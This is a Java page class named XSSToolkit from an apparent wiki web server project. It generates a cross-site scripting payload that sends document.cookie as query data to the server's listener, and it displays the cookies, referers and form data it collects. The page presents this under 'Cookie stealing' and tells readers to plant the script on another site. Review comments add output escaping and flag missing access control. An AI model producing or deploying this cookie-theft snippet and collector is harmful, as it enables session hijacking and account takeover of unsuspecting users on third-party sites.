package page.example;

import java.util.Map;

import org.wikiwebserver.core.WareHouse;
import org.wikiwebserver.core.WikiMap;
import org.wikiwebserver.handler.http.HTTPException;
import org.wikiwebserver.handler.http.interfaces.HTTPResponder;
import org.wikiwebserver.html.HTMLHelper.ContainerType;

import page.config.SiteTemplatedPage;

import static org.wikiwebserver.html.HTMLHelper.*;

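/**
 * Demonstration page for cross-site scripting: it shows a script snippet that
 * sends {@code document.cookie} to {@code page.image.RequestListener} as query
 * data, and lists whatever is stored in the shared "ImageRequestMonitor" map.
 *
 * <p>Everything read from that map (the Referer and the form data) originates
 * from requests made by third parties, so it is treated as untrusted and is
 * HTML-escaped before being written into this page. Without that, the page
 * that displays captured input would itself be open to stored XSS.
 *
 * <p>NOTE(review): nothing in this class restricts who may view the captured
 * data, which can contain session cookies. Confirm that access control is
 * applied elsewhere (template or server configuration).
 */
public class XSSToolkit extends SiteTemplatedPage implements HTTPResponder {

    /** Name of the shared map this page reads its captured data from. */
    private static final String MONITOR_MAP = "ImageRequestMonitor";

    /**
     * Builds the full page: explanation, the cookie-transfer snippet inside a
     * textarea, and the data captured so far.
     *
     * @throws HTTPException declared by the page contract; not thrown directly here
     */
    public void generate() throws HTTPException {

        setTitle("XSS Toolkit - WikiWebServer.org");
        addResourceRoot("/templates/default/viewer/");
        addCSSLink("viewer.css");

        WikiMap captured = getData();
        String listenerPath = WareHouse.getUrlPathForClass(page.image.RequestListener.class);

        // The Referer comes from a third-party request, so it is untrusted.
        // Escape it like the form data below. String.valueOf keeps the
        // original "Referer null" output when nothing has been captured yet
        // and avoids a ClassCastException on a non-String value.
        // The HTML helpers are assumed not to escape their content, since they
        // are used here to wrap already-built markup. TODO confirm.
        String referer = WareHouse.escapeHTMLEntities(
                String.valueOf(captured.get("Referer")));

        // Only script-readable cookies are visible to document.cookie; cookies
        // flagged HttpOnly are not transferred by this snippet.
        String cookieXferScript = javaScript(
               "document.writeln('<img src=\"" + getServiceAddress() +
               listenerPath +
               "?Cookie=' + escape(document.cookie) + '\"');");

        append(h(1, "Cross Site Scripting Toolkit") +
               p("This class monitors requests to " +
                 listenerPath + "." +
                 " Information can be sent with the request by adding query" +
                 " data. ") +
               h(2, "Cookie stealing") +
               p("By adding the following script to a web page on another site" +
                 " the site cookie will be sent to WikiWebServer.") +
               textarea("script", cookieXferScript, "rows='6' style='width: 100%'") +
               h(2, "Recieved data") +
               p("Referer " + referer) +
               div("formData", formatMap((WikiMap) captured.get("FormData")))
              );

        setPeriodicAjaxUpdateEnabled(true);
    }

    /**
     * Periodic update: re-renders the captured form data for the "formData"
     * element. The markup passed on is already HTML-escaped by
     * {@link #formatMap(Map)}.
     *
     * <p>NOTE(review): whether {@code updateHTMLScript} also escapes its
     * argument for the JavaScript context is not visible here. Confirm.
     */
    public void ajax() {
        append(updateHTMLScript("formData", formatMap((WikiMap) getData().get("FormData"))));
    }

    /**
     * Renders a map as a sequence of key/value rows with HTML-escaped content.
     *
     * @param data captured entries, or {@code null} if none were stored
     * @return HTML for the entries, or a "No data" paragraph when {@code data} is null
     */
    private String formatMap(Map<String, Object> data) {
        if (data == null) {
            return p("No data");
        }

        StringBuilder html = new StringBuilder();
        for (Map.Entry<String, Object> entry : data.entrySet()) {
            String key = WareHouse.escapeHTMLEntities(entry.getKey());
            // String.valueOf tolerates a null value instead of throwing a
            // NullPointerException and breaking the whole listing.
            String value = WareHouse.escapeHTMLEntities(String.valueOf(entry.getValue()));
            html.append(div(ContainerType.CLASS, "entry",
                            div(ContainerType.CLASS, "key", key) +
                            div(ContainerType.CLASS, "value", value)
                            ) +
                        cleardiv()
                        );
        }
        return html.toString();
    }

    /**
     * Returns the shared map holding the captured request data, creating it
     * on first use.
     *
     * @return the "ImageRequestMonitor" map
     */
    public WikiMap getData() {
        WikiMap map = WareHouse.getWikiMap(MONITOR_MAP);
        if (map == null) {
            map = WareHouse.initWikiMap(MONITOR_MAP);
        }
        return map;
    }

    /**
     * Cache key derived from the data map's last-modified time, so the key
     * changes whenever that timestamp changes.
     */
    @Override
    public String getCacheKey() {
        return String.valueOf(getData().getLastModifiedTime());
    }
}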